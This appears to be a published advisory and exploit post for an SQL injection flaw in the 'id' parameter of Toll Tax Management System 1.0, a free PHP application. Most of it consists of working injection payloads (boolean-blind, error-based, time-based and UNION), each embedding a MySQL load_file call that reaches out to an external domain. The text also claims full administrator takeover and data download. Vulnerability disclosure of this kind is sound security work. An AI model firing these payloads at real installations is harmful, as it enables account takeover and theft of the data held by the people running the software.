Headline
Toll Tax Management System 1.0 SQL Injection
Toll Tax Management System version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Toll Tax Management System v1.0 SQLi## Author: nu11secur1ty## Date: 04.07.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+'was submitted in the id parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''RLIKE (SELECT (CASE WHEN (5512=5512) THEN 0x31+(selectload_file(0x5c5c5c5c6f6b63316837336d766b6b727978386c627869633479647066676c39393461733176706d636330312e6e616d61696b6174697075746b6174615f747570616b6f2e6e65745c5c777a6d))+''ELSE 0x28 END)) AND 'XhmU'='XhmU Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''OR (SELECT 2787 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT(ELT(2787=2787,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CIPJ'='CIPJ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''AND (SELECT 6043 FROM (SELECT(SLEEP(5)))rrdD) AND 'XHBJ'='XHBJ Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=1'+(selectload_file('\\\\okc1h73mvkkryx8lbxic4ydpfgl994as1vpmcc01.namaikatiputkata_tupako.net\\wzm'))+''UNION ALL SELECTCONCAT(0x716a7a7a71,0x5346494143536a6c474b6b47466d494770794552614258734b42674c475945726d5a757674474b73,0x71626a6271),NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Toll-Tax-Management-System)## Proof and Exploit:[href](https://streamable.com/y9xo4q)